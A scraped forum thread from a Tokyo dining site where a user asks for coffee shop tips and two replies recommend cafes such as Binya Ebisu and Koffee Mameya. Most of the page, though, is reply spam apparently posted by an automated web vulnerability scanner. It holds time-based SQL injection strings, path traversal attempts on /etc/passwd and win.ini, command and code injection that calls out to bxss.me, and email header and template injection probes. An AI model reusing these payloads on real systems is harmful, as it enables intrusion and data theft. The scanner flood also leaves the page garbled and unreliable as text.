Tokyo Table Trip

Logo discover 8a060a5a25d78a2d81322b0a16884eb1c05869ebadb772a16350e198984e5cfb

BACK

Coffee shops

Yee How

Is there any recommendations for coffee shops in Tokyo?

Add photos

5 Comments


For something that is more in line with Japanese style Kohi-ten or Kissaten, and a rare non smoking one at that, I really enjoy Binya Ebisu
https://tabelog.com/en/tokyo/A1303/A130302/13014332/

It's very close to JR Ebisu station exit, upscale/retro/elegant. Though they open a bit later, but also offer savory courses. Don't miss their hotcakes made with Hokkaido flour and other delectable desserts (kanten) and also yogashi / castella cake too. This is a very local experience. I think they opened originally in Shizuoka, and Ebisu is their only other branch outside.

For a chain, I enjoy Tsubakiya https://tabelog.com/en/tokyo/A1301/A130102/13007559/ (this location in Yurakucho), although the non smoking room gets fumes from the smoking section. It also has nice retro vibes and their cakes are quite excellent (coffee tube cake). The premium iced coffee includes coffee ice cubes.

Cafe de L'ambre also has some retro charm (but is not non smoking). There are also lots of western / European third wave coffee shops, so I suppose it also depends what you are looking for.

1668110113 Reply
Add photos

re: ChuToroZuke

JyDff9uI

1696997028

re: ChuToroZuke

1*

1696997029

re: ChuToroZuke

1*

1696997029

re: ChuToroZuke

1*

1696997029

re: ChuToroZuke

1*

1696997029

re: ChuToroZuke

-1 OR 2+783-783-1=0+0+0+1

1696997029

re: ChuToroZuke

-1 OR 3+783-783-1=0+0+0+1

1696997030

re: ChuToroZuke

if(now()=sysdate(),sleep(15),0)

1696997039

re: ChuToroZuke

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1696997049

re: ChuToroZuke

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1696997058

re: ChuToroZuke

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1696997068

re: ChuToroZuke

-1; waitfor delay '0:0:15' --

1696997077

re: ChuToroZuke

-1); waitfor delay '0:0:15' --

1696997088

re: ChuToroZuke

1 waitfor delay '0:0:15' --

1696997098

re: ChuToroZuke

ViN5Vd8K'; waitfor delay '0:0:15' --

1696997107

re: ChuToroZuke

-5 OR 631=(SELECT 631 FROM PG_SLEEP(15))--

1696997117

re: ChuToroZuke

-5) OR 741=(SELECT 741 FROM PG_SLEEP(15))--

1696997128

re: ChuToroZuke

-1)) OR 677=(SELECT 677 FROM PG_SLEEP(15))--

1696997135

re: ChuToroZuke

W5MBttQe' OR 430=(SELECT 430 FROM PG_SLEEP(15))--

1696997141

re: ChuToroZuke

sAQtk9Wj') OR 842=(SELECT 842 FROM PG_SLEEP(15))--

1696997146

re: ChuToroZuke

2eIuzeao')) OR 696=(SELECT 696 FROM PG_SLEEP(15))--

1696997150

re: ChuToroZuke


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1696997154

re: ChuToroZuke


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1696997161

re: ChuToroZuke

'||(select 1 from (select pg_sleep(15))x)||'

1696997168

re: ChuToroZuke

''||(select 1 from (select pg_sleep(15))x)||''

1696997174

re: ChuToroZuke

1'"

1696997174

re: ChuToroZuke

@@9WtwE

1696997175

re: ChuToroZuke

70LQYHds

1697002569

re: ChuToroZuke

1*

1697002569

re: ChuToroZuke

1*

1697002569

re: ChuToroZuke

1*

1697002570

re: ChuToroZuke

1*

1697002570

re: ChuToroZuke

-1 OR 2+310-310-1=0+0+0+1

1697002570

re: ChuToroZuke

-1 OR 3+310-310-1=0+0+0+1

1697002571

re: ChuToroZuke

if(now()=sysdate(),sleep(15),0)

1697002575

re: ChuToroZuke

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002579

re: ChuToroZuke

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002584

re: ChuToroZuke

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002588

re: ChuToroZuke

-1; waitfor delay '0:0:15' --

1697002593

re: ChuToroZuke

-1); waitfor delay '0:0:15' --

1697002597

re: ChuToroZuke

1 waitfor delay '0:0:15' --

1697002602

re: ChuToroZuke

X2bUM9sZ'; waitfor delay '0:0:15' --

1697002605

re: ChuToroZuke

-5 OR 175=(SELECT 175 FROM PG_SLEEP(15))--

1697002610

re: ChuToroZuke

-5) OR 872=(SELECT 872 FROM PG_SLEEP(15))--

1697002616

re: ChuToroZuke

-1)) OR 281=(SELECT 281 FROM PG_SLEEP(15))--

1697002621

re: ChuToroZuke

NGcynW4W' OR 391=(SELECT 391 FROM PG_SLEEP(15))--

1697002624

re: ChuToroZuke

E7Gzm682') OR 759=(SELECT 759 FROM PG_SLEEP(15))--

1697002628

re: ChuToroZuke

fB1rogLl')) OR 116=(SELECT 116 FROM PG_SLEEP(15))--

1697002633

re: ChuToroZuke


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002639

re: ChuToroZuke


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002642

re: ChuToroZuke

'||(select 1 from (select pg_sleep(15))x)||'

1697002647

re: ChuToroZuke

''||(select 1 from (select pg_sleep(15))x)||''

1697002652

re: ChuToroZuke

1'"

1697002652

re: ChuToroZuke

@@TExWv

1697002653

re: ChuToroZuke

1kqz8ZoxO

1727140883

re: ChuToroZuke

response.write(9095629*9712792)

1727140887

re: ChuToroZuke

'+response.write(9095629*9712792)+'

1727140887

re: ChuToroZuke

"+response.write(9095629*9712792)+"

1727140888

re: ChuToroZuke

../../../../../../../../../../../../../../etc/passwd

1727140893

re: ChuToroZuke

../../../../../../../../../../../../../../windows/win.ini

1727140893

re: ChuToroZuke

file:///etc/passwd

1727140894

re: ChuToroZuke

echo kvffgy$()\ tgevbf\nz^xyu||a #' &echo kvffgy$()\ tgevbf\nz^xyu||a #|" &echo kvffgy$()\ tgevbf\nz^xyu||a #

1727140894

re: ChuToroZuke

../../../../../../../../../../../../../../../proc/version

1727140894

re: ChuToroZuke

&echo nfmmdf$()\ kadics\nz^xyu||a #' &echo nfmmdf$()\ kadics\nz^xyu||a #|" &echo nfmmdf$()\ kadics\nz^xyu||a #

1727140895

re: ChuToroZuke

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140895

re: ChuToroZuke

|echo fdnqwr$()\ wrisfi\nz^xyu||a #' |echo fdnqwr$()\ wrisfi\nz^xyu||a #|" |echo fdnqwr$()\ wrisfi\nz^xyu||a #

1727140895

re: ChuToroZuke

../../../../../../../../../../etc/passwd%00.jpg

1727140895

re: ChuToroZuke

(nslookup hitaefodtdirna138b.bxss.me||perl -e "gethostbyname('hitaefodtdirna138b.bxss.me')")

1727140896

re: ChuToroZuke

$(nslookup hitquyvrplemueb1d3.bxss.me||perl -e "gethostbyname('hitquyvrplemueb1d3.bxss.me')")

1727140896

re: ChuToroZuke

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140896

re: ChuToroZuke

&nslookup hitadlkmkbozuac8f1.bxss.me&'\"`0&nslookup hitadlkmkbozuac8f1.bxss.me&`'

1727140896

re: ChuToroZuke

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140897

re: ChuToroZuke

&(nslookup hitufyvjkwfwcd4709.bxss.me||perl -e "gethostbyname('hitufyvjkwfwcd4709.bxss.me')")&'\"`0&(nslookup hitufyvjkwfwcd4709.bxss.me||perl -e "gethostbyname('hitufyvjkwfwcd4709.bxss.me')")&`'

1727140897

re: ChuToroZuke

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140897

re: ChuToroZuke

|(nslookup hitwsgpucnqcrb41e6.bxss.me||perl -e "gethostbyname('hitwsgpucnqcrb41e6.bxss.me')")

1727140897

re: ChuToroZuke

/etc/passwd

1727140898

re: ChuToroZuke

`(nslookup hitbmgplgbstgeaae4.bxss.me||perl -e "gethostbyname('hitbmgplgbstgeaae4.bxss.me')")`

1727140898

re: ChuToroZuke

;(nslookup hitnjtdoctitj0d993.bxss.me||perl -e "gethostbyname('hitnjtdoctitj0d993.bxss.me')")|(nslookup hitnjtdoctitj0d993.bxss.me||perl -e "gethostbyname('hitnjtdoctitj0d993.bxss.me')")&(nslookup hitnjtdoctitj0d993.bxss.me||perl -e "gethostbyname('hitnjtdoctitj0d993.bxss.me')")

1727140898

re: ChuToroZuke

%2fetc%2fpasswd

1727140898

re: ChuToroZuke

/.././.././.././.././.././.././.././../etc/./passwd%00

1727140899

re: ChuToroZuke

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727140899

re: ChuToroZuke

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727140900

re: ChuToroZuke

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727140900

re: ChuToroZuke

%0abcc:074625.67-13673.67.26c4e.19990.2@bxss.me

1727140901

re: ChuToroZuke

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727140901

re: ChuToroZuke

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727140901

re: ChuToroZuke

to@example.com>%0d%0abcc:074625.67-13674.67.26c4e.19990.2@bxss.me

1727140901

re: ChuToroZuke

file:///etc/passwd

1727140902

re: ChuToroZuke

/\../\../\../\../\../\../\../etc/passwd

1727140902

re: ChuToroZuke

/WEB-INF/web.xml

1727140903

re: ChuToroZuke

C:\WINDOWS\system32\drivers\etc\hosts

1727140903

re: ChuToroZuke

../../../../../../../../../../windows/win.ini%00.jpg

1727140903

re: ChuToroZuke

/../../../../../../../../../../boot.ini

1727140904

re: ChuToroZuke

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727140904

re: ChuToroZuke

..\..\..\..\..\..\..\..\windows\win.ini

1727140905

re: ChuToroZuke

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727140905

re: ChuToroZuke

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727140906

re: ChuToroZuke

<esi:include src="http://bxss.me/rpb.png"/>

1727140906

re: ChuToroZuke

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727140906

re: ChuToroZuke

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727140907

re: ChuToroZuke

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727140907

re: ChuToroZuke

${10000233+10000292}

1727140907

re: ChuToroZuke

WEB-INF/web.xml

1727140908

re: ChuToroZuke

WEB-INF\web.xml

1727140908

re: ChuToroZuke

)

1727140911

re: ChuToroZuke

!(()&&!|*|*|

1727140912

re: ChuToroZuke

^(#$!@#$)(()))******

1727140912

re: ChuToroZuke

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727140915

re: ChuToroZuke

1727140915

1727140916

re: ChuToroZuke

/etc/shells

1727140916

re: ChuToroZuke

c:/windows/win.ini

1727140916

re: ChuToroZuke

bxss.me

1727140917

re: ChuToroZuke

'.gethostbyname(lc('hitvn'.'ajdalodv181a6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(89).chr(98).chr(86).'

1727140919

re: ChuToroZuke

".gethostbyname(lc("hithi"."jhduoojv91b96.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(90).chr(118).chr(80)."

1727140920

re: ChuToroZuke

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727140923

1727140923

re: ChuToroZuke

';print(md5(31337));$a='

1727140923

re: ChuToroZuke

bxss.me/t/xss.html?%00

1727140923

re: ChuToroZuke

";print(md5(31337));$a="

1727140924

re: ChuToroZuke

${@print(md5(31337))}

1727140924

re: ChuToroZuke

${@print(md5(31337))}\

1727140925

re: ChuToroZuke

'.print(md5(31337)).'

1727140925

re: ChuToroZuke

"+"A".concat(70-3).concat(22*4).concat(116).concat(87).concat(120).concat(67)+(require"socket"
Socket.gethostbyname("hitke"+"rrjoqpxle60a0.bxss.me.")[3].to_s)+"

1727140926

re: ChuToroZuke

'+'A'.concat(70-3).concat(22*4).concat(118).concat(65).concat(122).concat(82)+(require'socket'
Socket.gethostbyname('hiteg'+'ykmtgdie158af.bxss.me.')[3].to_s)+'

1727140926

re: ChuToroZuke

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727140928

re: ChuToroZuke

'"

1727140929

re: ChuToroZuke

<!--

1727140929

re: ChuToroZuke

1

1727141312

re: ChuToroZuke

1

1727141328

re: ChuToroZuke

-1 OR 2+529-529-1=0+0+0+1 --

1727141330

re: ChuToroZuke

-1 OR 3+529-529-1=0+0+0+1 --

1727141331

re: ChuToroZuke

-1 OR 2+629-629-1=0+0+0+1

1727141332

re: ChuToroZuke

-1 OR 3+629-629-1=0+0+0+1

1727141333

re: ChuToroZuke

-1' OR 2+948-948-1=0+0+0+1 --

1727141334

re: ChuToroZuke

-1' OR 3+948-948-1=0+0+0+1 --

1727141334

re: ChuToroZuke

-1' OR 2+170-170-1=0+0+0+1 or 'EJPi2w5m'='

1727141335

re: ChuToroZuke

-1' OR 3+170-170-1=0+0+0+1 or 'EJPi2w5m'='

1727141335

re: ChuToroZuke

-1" OR 2+766-766-1=0+0+0+1 --

1727141336

re: ChuToroZuke

-1" OR 3+766-766-1=0+0+0+1 --

1727141337

re: ChuToroZuke

if(now()=sysdate(),sleep(15),0)

1727141350

re: ChuToroZuke

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141364

re: ChuToroZuke

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141379

re: ChuToroZuke

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141394

re: ChuToroZuke

-1; waitfor delay '0:0:15' --

1727141407

re: ChuToroZuke

-1); waitfor delay '0:0:15' --

1727141420

re: ChuToroZuke

1 waitfor delay '0:0:15' --

1727141433

re: ChuToroZuke

GO2PX8ng'; waitfor delay '0:0:15' --

1727141462

re: ChuToroZuke

-5 OR 39=(SELECT 39 FROM PG_SLEEP(15))--

1727141496

re: ChuToroZuke

-5) OR 434=(SELECT 434 FROM PG_SLEEP(15))--

1727141507

re: ChuToroZuke

-1)) OR 547=(SELECT 547 FROM PG_SLEEP(15))--

1727141514

re: ChuToroZuke

aYXFULS5' OR 407=(SELECT 407 FROM PG_SLEEP(15))--

1727141522

re: ChuToroZuke

pdaU98hF') OR 136=(SELECT 136 FROM PG_SLEEP(15))--

1727141530

re: ChuToroZuke

v0wUDDVu')) OR 305=(SELECT 305 FROM PG_SLEEP(15))--

1727141538

re: ChuToroZuke

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141545

re: ChuToroZuke

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141553

re: ChuToroZuke

'||(select 1 from (select pg_sleep(15))x)||'

1727141561

re: ChuToroZuke

''||(select 1 from (select pg_sleep(15))x)||''

1727141574

re: ChuToroZuke

1'"

1727141575

re: ChuToroZuke

@@nBoId

1727141577

1. Koffee Mameya
2. Glitch Coffee
3. Acid Coffee
4. Fuglen Coffee Roasters
5. Leaves Coffee Roasters

1668119680 Reply
Add photos

re: Brady

9ITIkeP1

1697002503

re: Brady

1*

1697002503

re: Brady

1*

1697002503

re: Brady

1*

1697002503

re: Brady

1*

1697002504

re: Brady

-1 OR 2+289-289-1=0+0+0+1

1697002504

re: Brady

-1 OR 3+289-289-1=0+0+0+1

1697002504

re: Brady

if(now()=sysdate(),sleep(15),0)

1697002508

re: Brady

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002513

re: Brady

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002517

re: Brady

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002522

re: Brady

-1; waitfor delay '0:0:15' --

1697002526

re: Brady

-1); waitfor delay '0:0:15' --

1697002531

re: Brady

1 waitfor delay '0:0:15' --

1697002536

re: Brady

SH19mUzT'; waitfor delay '0:0:15' --

1697002540

re: Brady

-5 OR 345=(SELECT 345 FROM PG_SLEEP(15))--

1697002544

re: Brady

-5) OR 167=(SELECT 167 FROM PG_SLEEP(15))--

1697002550

re: Brady

-1)) OR 936=(SELECT 936 FROM PG_SLEEP(15))--

1697002554

re: Brady

Y6HbWCJP' OR 272=(SELECT 272 FROM PG_SLEEP(15))--

1697002559

re: Brady

0r7K2o8o') OR 243=(SELECT 243 FROM PG_SLEEP(15))--

1697002564

re: Brady

0gvOtyXO')) OR 280=(SELECT 280 FROM PG_SLEEP(15))--

1697002569

re: Brady


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002573

re: Brady


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002577

re: Brady

'||(select 1 from (select pg_sleep(15))x)||'

1697002582

re: Brady

''||(select 1 from (select pg_sleep(15))x)||''

1697002586

re: Brady

1'"

1697002587

re: Brady

@@c0SNM

1697002587

re: Brady

ecdEMHxI

1697002634

re: Brady

1*

1697002634

re: Brady

1*

1697002635

re: Brady

1*

1697002635

re: Brady

1*

1697002635

re: Brady

-1 OR 2+673-673-1=0+0+0+1

1697002635

re: Brady

-1 OR 3+673-673-1=0+0+0+1

1697002635

re: Brady

if(now()=sysdate(),sleep(15),0)

1697002640

re: Brady

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002644

re: Brady

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002648

re: Brady

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002653

re: Brady

-1; waitfor delay '0:0:15' --

1697002660

re: Brady

-1); waitfor delay '0:0:15' --

1697002664

re: Brady

1 waitfor delay '0:0:15' --

1697002668

re: Brady

hoN9VpG1'; waitfor delay '0:0:15' --

1697002672

re: Brady

-5 OR 643=(SELECT 643 FROM PG_SLEEP(15))--

1697002676

re: Brady

-5) OR 290=(SELECT 290 FROM PG_SLEEP(15))--

1697002681

re: Brady

-1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))--

1697002684

re: Brady

MJ8jFpkk' OR 204=(SELECT 204 FROM PG_SLEEP(15))--

1697002688

re: Brady

4G8U2lMy') OR 493=(SELECT 493 FROM PG_SLEEP(15))--

1697002692

re: Brady

gbKxT8GN')) OR 871=(SELECT 871 FROM PG_SLEEP(15))--

1697002696

re: Brady


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002700

re: Brady


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002704

re: Brady

'||(select 1 from (select pg_sleep(15))x)||'

1697002708

re: Brady

''||(select 1 from (select pg_sleep(15))x)||''

1697002712

re: Brady

1'"

1697002713

re: Brady

@@DuhhH

1697002714

re: Brady

1Ndh6RncO

1727140363

re: Brady

%0abcc:074625.67-13502.67.be7c5.19990.2@bxss.me

1727140367

re: Brady

response.write(9890923*9960614)

1727140367

re: Brady

